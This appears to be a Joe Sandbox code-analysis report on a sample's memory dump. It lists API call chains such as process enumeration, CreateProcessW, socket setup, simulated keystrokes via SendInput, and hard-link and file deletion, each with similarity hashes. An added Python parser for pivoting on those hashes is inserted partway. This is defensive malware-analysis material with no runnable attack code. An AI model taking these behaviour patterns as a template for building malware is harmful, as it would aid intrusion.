• Instruction ID: 81f71bd9aed96a9a1788fe7c6c2d645c5ac8bc0181e34b86d8b824f9c9d7b4a9
• Instruction Fuzzy Hash: 5421CA74706501CFDB18DB16F895B2533E1EB86711F0C915DE70AAB269CB34AC88CB21

APIs
• GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E36360
• SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00E3638D
• DrawMenuBar.USER32(?), ref: 00E3639C
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Menu$InfoItem$Draw
• String ID: 0
• API String ID: 3227129158-4108050209
• Opcode ID: 70ce2457b56765aa2e6ef7a1b53fa8b0713e3d9d48b22b6803351aed228e7554
• Instruction ID: 0c50ca773cd141f5822cbdfc240faf32ccccb953aa8760b7d2646a33f39984d6
• Opcode Fuzzy Hash: 70ce2457b56765aa2e6ef7a1b53fa8b0713e3d9d48b22b6803351aed228e7554
• Instruction Fuzzy Hash: 5E015B32514218EFDB119F21DC88FAABFB4FB84355F148099E849E6150DB308A85EF31

APIs
• GetForegroundWindow.USER32(?,00E728E0,00E3AD55,000000FC,?,00000000,00000000,?), ref: 00E3823F
• GetFocus.USER32 ref: 00E38247
  • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
  • Part of subcall function 00DA2234: GetWindowLongW.USER32(?,000000EB), ref: 00DA2242
• SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 00E382B4
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Window$Long$FocusForegroundMessageSend
• String ID: (
• API String ID: 3601265619-2063206799
• Opcode ID: a0b0b385fe671493030d061f8160c5e1e836f38175cff27ca6dfd15f91f647ea
• Instruction ID: d473166f5e3bb261fe705b0b370bc223f70fb790695c489a1903825907f17579
• Opcode Fuzzy Hash: a0b0b385fe671493030d061f8160c5e1e836f38175cff27ca6dfd15f91f647ea
• Instruction Fuzzy Hash: FA017531602A00CFC315DF79D858A663BEAEBCA324F29015DE516A72B0CB31AC4BCB50

APIs
• DestroyAcceleratorTable.USER32(?), ref: 00E38576
• CreateAcceleratorTableW.USER32(00000000,?,?,?,00E1BE96,00000000,00000000,?,00000001,00000002), ref: 00E3858C
• GetForegroundWindow.USER32(?,00E1BE96,00000000,00000000,?,00000001,00000002), ref: 00E38595
  • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
• String ID: (
• API String ID: 986409557-2063206799
• Opcode ID: 70cd6ba5ccfc825ea487b1438fb4211f56044973de555ec0e1f8fc95e8c2d33e
• Instruction ID: e607ed527362d1dac30a3d57c131977d006557789f9cc2d3a756607c0a808508
• Opcode Fuzzy Hash: 70cd6ba5ccfc825ea487b1438fb4211f56044973de555ec0e1f8fc95e8c2d33e
• Instruction Fuzzy Hash: DD016D30601309EFCB25DF6AEC88A657BB1FB44325F14551DF615A72B0DB30E898CB40

APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E74038,00E7407C), ref: 00E38C1A
• CloseHandle.KERNEL32 ref: 00E38C2C
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: 8@$|@
• API String ID: 3712363035-2203533388
• Opcode ID: 94f7df82892ea64499214317c6b6df776fc5083e3537942c0035aa19facabf0d
• Instruction ID: 61e9b1dc0ea90ed588992f49829227028451fb4b30de37849eb6782d80de17ee
• Opcode Fuzzy Hash: 94f7df82892ea64499214317c6b6df776fc5083e3537942c0035aa19facabf0d
• Instruction Fuzzy Hash: 46F03AF2581304BEE710AB62AC4AFB73E5CEB14350F004025BB0CF61E1DB654C5892BA
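
Every function entry in this section has the same shape: an APIs list whose lines end in a `ref:` address (nested "Part of subcall function" lines belong to a callee), an optional Strings list, the Memory Dump Source the code was lifted from, and a Similarity block whose Opcode and Instruction fuzzy hashes are what you pivot on across reports. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses that layout into records, builds each function's API chain, groups entries by a Similarity field, and decodes the dwCreationFlags argument (the sixth one, 00000020 in the CreateProcessW call above) against the documented Win32 flag values. SAMPLE is constructed from two entries on this page, the record field names are this example's own, and one Associated line deliberately keeps the page's "Download File" link text to show it being stripped.

```python
"""Parse Joe Sandbox 'Code Analysis' function entries into records (added example,
not part of the Joe Sandbox report). SAMPLE is constructed from two entries on this
page; one Associated line keeps the page's 'Download File' link text on purpose."""
import re
from collections import defaultdict

SAMPLE = """\
APIs
• GetForegroundWindow.USER32(?,00E728E0,00E3AD55,000000FC,?,00000000,00000000,?), ref: 00E3823F
• GetFocus.USER32 ref: 00E38247
  • Part of subcall function 00DA249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DA24B0
• SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 00E382B4
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Window$Long$FocusForegroundMessageSend
• String ID: (
• Opcode Fuzzy Hash: a0b0b385fe671493030d061f8160c5e1e836f38175cff27ca6dfd15f91f647ea
• Instruction Fuzzy Hash: FA017531602A00CFC315DF79D858A663BEAEBCA324F29015DE516A72B0CB31AC4BCB50
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E74038,00E7407C), ref: 00E38C1A
• CloseHandle.KERNEL32 ref: 00E38C2C
Similarity
• API ID: CloseCreateHandleProcess
• Instruction Fuzzy Hash: 46F03AF2581304BEE710AB62AC4AFB73E5CEB14350F004025BB0CF61E1DB654C5892BA
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?(?P<name>\w+)\."
                    r"(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
SRC_RE = re.compile(r"^(?P<file>\S+), Offset: (?P<offset>[0-9A-F]+), based on PE: (?P<pe>\w+)$")
# dwCreationFlags bits (6th CreateProcessW argument), values from the Win32 documentation.
CREATION_FLAGS = {0x4: "CREATE_SUSPENDED", 0x8: "DETACHED_PROCESS", 0x10: "CREATE_NEW_CONSOLE",
                  0x20: "NORMAL_PRIORITY_CLASS", 0x200: "CREATE_NEW_PROCESS_GROUP",
                  0x400: "CREATE_UNICODE_ENVIRONMENT", 0x80000: "EXTENDED_STARTUPINFO_PRESENT",
                  0x1000000: "CREATE_BREAKAWAY_FROM_JOB", 0x8000000: "CREATE_NO_WINDOW"}

def _new_entry():
    return {"apis": [], "strings": [], "source": {}, "similarity": {}}

def _slug(key):
    return key.strip().lower().replace(" ", "_")

def parse_entries(text):
    """One dict per analysed function; an entry ends at its Instruction Fuzzy Hash line."""
    entries, cur, section = [], _new_entry(), None
    for line in text.splitlines():
        body = line.strip()
        if body in SECTIONS:
            section = body
            continue
        body = body.lstrip("• ")                       # bullet and indent carry no data
        if not body:
            continue
        if section == "APIs":
            m = API_RE.match(body)                     # lines of any other shape are skipped
            if m:
                cur["apis"].append({"name": m["name"], "module": m["module"], "ref": m["ref"],
                                    "args": [a for a in (m["args"] or "").split(",") if a],
                                    "subcall_of": m["sub"]})
        elif section == "Strings":
            cur["strings"].append(body)
        else:
            key, _, val = body.partition(":")
            key, val = key.strip(), val.strip().removesuffix("Download File")  # HTML link text
            if section == "Similarity":
                cur["similarity"][_slug(key)] = val
                if key == "Instruction Fuzzy Hash":
                    entries.append(cur)
                    cur, section = _new_entry(), None
            elif key == "Source File" and (s := SRC_RE.match(val)):
                cur["source"].update(file=s["file"], offset=int(s["offset"], 16),
                                     based_on_pe=s["pe"] == "true")
            elif key == "Associated":
                cur["source"].setdefault("associated", []).append(val)
            else:                                      # Snapshot File and similar key/value lines
                cur["source"][_slug(key)] = val
    return entries

def api_chain(entry, include_subcalls=False):
    """'A>B>C' of the function's API calls, the simplest cross-report pivot."""
    return ">".join(a["name"] for a in entry["apis"] if include_subcalls or a["subcall_of"] is None)

def index_by(entries, field):
    """Group entries on one Similarity field, e.g. 'instruction_fuzzy_hash'."""
    idx = defaultdict(list)
    for e in entries:
        idx[e["similarity"].get(field, "")].append(e)
    return dict(idx)

def creation_flags(entry):
    """Decode dwCreationFlags of each CreateProcess call whose flag argument was logged."""
    out = []
    for a in entry["apis"]:
        if a["name"] in ("CreateProcessW", "CreateProcessA") and len(a["args"]) > 5 and a["args"][5] != "?":
            v = int(a["args"][5], 16)
            rest = v & ~sum(CREATION_FLAGS)            # bits missing from the table, kept as hex
            out.append([n for b, n in CREATION_FLAGS.items() if v & b] + ([f"0x{rest:X}"] if rest else []))
    return out
```

Feed it the report section saved as plain text and pivot on `index_by(entries, "instruction_fuzzy_hash")`: the instruction fuzzy hash is what survives a rebuild with relocated addresses, while the API chain is the quick way to spot the same helper (for example the GetForegroundWindow/GetWindowLongW pair repeated across the entries above) in a different sample's report. An entry cut off before its Instruction Fuzzy Hash line, as at the end of this page, is not emitted.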

Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0a5dc4f6409fe466696d633a4514e5f9e66b7c874c430141bd13893bc88ecfe4
• Instruction ID: d8e0e39d15bbe7180b6b926e537f3fa91b529f0d511cd57f7759736e47be45d3
• Opcode Fuzzy Hash: 0a5dc4f6409fe466696d633a4514e5f9e66b7c874c430141bd13893bc88ecfe4
• Instruction Fuzzy Hash: 22C13975A0020AEFDB14CF94C894FAAB7B5FF48718F249598E505AB291D731EE81CB90

APIs
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
• Instruction ID: 85db6ce00a18817a87ef1c4ba878927830801d8a08cbb13aa08006bdf3d1d6b4
• Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
• Instruction Fuzzy Hash: 2CA145729403869FDB21DF18C8917AEBBE4EF51314F2841AEE5959B381C3789981C770
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E40BD4,?), ref: 00E00EE0
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E40BD4,?), ref: 00E00EF8
• CLSIDFromProgID.OLE32(?,?,00000000,00E3DCE0,000000FF,?,00000000,00000800,00000000,?,00E40BD4,?), ref: 00E00F1D
• _memcmp.LIBVCRUNTIME ref: 00E00F3E
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00E2B10C
• Process32FirstW.KERNEL32(00000000,?), ref: 00E2B11A
  • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
• Process32NextW.KERNEL32(00000000,?), ref: 00E2B1FC
• CloseHandle.KERNEL32(00000000), ref: 00E2B20B
  • Part of subcall function 00DBE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00DE4D73,?), ref: 00DBE395
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
• String ID:
• API String ID: 1991900642-0
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00E2255A
• WSAGetLastError.WSOCK32 ref: 00E22568
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E225E7
• WSAGetLastError.WSOCK32 ref: 00E225F1
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: ErrorLast$socket
• String ID:
• API String ID: 1881357543-0
APIs
• GetWindowRect.USER32(?,?), ref: 00E36D1A
• ScreenToClient.USER32(?,?), ref: 00E36D4D
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00E36DBA
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E161C8
• GetLastError.KERNEL32(?,00000000), ref: 00E161EE
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E16213
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E1623F
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
                                                                                                                                                                              • Opcode ID: 53cabfddaa515a517ad3a6bbf3d060267fc7f1ace47a91ef459cee784d953342
                                                                                                                                                                              • Instruction ID: 65f04cce47f32ba83ef9b91ea5685c8b6a54245d14621e95ebbe5e0d905d4387
                                                                                                                                                                              • Opcode Fuzzy Hash: 53cabfddaa515a517ad3a6bbf3d060267fc7f1ace47a91ef459cee784d953342
                                                                                                                                                                              • Instruction Fuzzy Hash: 79412C75A00610DFCB11DF15C545A5ABBF2EF8A714B188888FC4AAB362CB31FD41DBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00E0B473
                                                                                                                                                                              • SetKeyboardState.USER32(00000080), ref: 00E0B48F
                                                                                                                                                                              • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00E0B4FD
                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00E0B54F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 432972143-0
                                                                                                                                                                              • Opcode ID: ec4e4d29bfdabce80566c24b735510749af316269b933326fbebfde3ec90397b
                                                                                                                                                                              • Instruction ID: 56201cbf3bc58125d4b4de326120a38ca90055aa4f1b5dbe972165ebb7164fc8
                                                                                                                                                                              • Opcode Fuzzy Hash: ec4e4d29bfdabce80566c24b735510749af316269b933326fbebfde3ec90397b
                                                                                                                                                                              • Instruction Fuzzy Hash: E4315970A4430CAEFF308B659C097FA7BB6BB54314F08525AE4A5B61D2E3748AC58761
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00E0B5B8
                                                                                                                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E0B5D4
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E0B63B
                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00E0B68D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 432972143-0
                                                                                                                                                                              • Opcode ID: dd5a1818f273d661f8cc36f0a0255998a76cd2750e478ce5507302531abb0a29
                                                                                                                                                                              • Instruction ID: 0a493167624d8bce5f6b1ccf65e88b443a3239aeadbef200b8da97ab22c39ae0
                                                                                                                                                                              • Opcode Fuzzy Hash: dd5a1818f273d661f8cc36f0a0255998a76cd2750e478ce5507302531abb0a29
                                                                                                                                                                              • Instruction Fuzzy Hash: C4310B3094060CAFFF308B659C097FA7BA6FF95314F08522AE481761D1C37689D58B55
                                                                                                                                                                              APIs
                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 00E380D4
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00E3814A
                                                                                                                                                                              • PtInRect.USER32(?,?,?), ref: 00E3815A
                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 00E381C6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1352109105-0
                                                                                                                                                                              • Opcode ID: a1e5f4637008c0241259c564276b91c76adcd4f2e6b1efc4707cd2102e9119e8
                                                                                                                                                                              • Instruction ID: 9c88865ef94456413b872dfaa372087a13f58167d56529719b03f1576a42ff85
                                                                                                                                                                              • Opcode Fuzzy Hash: a1e5f4637008c0241259c564276b91c76adcd4f2e6b1efc4707cd2102e9119e8
                                                                                                                                                                              • Instruction Fuzzy Hash: 3E418F30A02315DFCB15CF59C988AA97FF5FB85314F1451A8FA55BB261CB30A986CB90
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00E32187
                                                                                                                                                                                • Part of subcall function 00E04393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E043AD
                                                                                                                                                                                • Part of subcall function 00E04393: GetCurrentThreadId.KERNEL32 ref: 00E043B4
                                                                                                                                                                                • Part of subcall function 00E04393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E02F00), ref: 00E043BB
                                                                                                                                                                              • GetCaretPos.USER32(?), ref: 00E3219B
                                                                                                                                                                              • ClientToScreen.USER32(00000000,?), ref: 00E321E8
                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00E321EE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
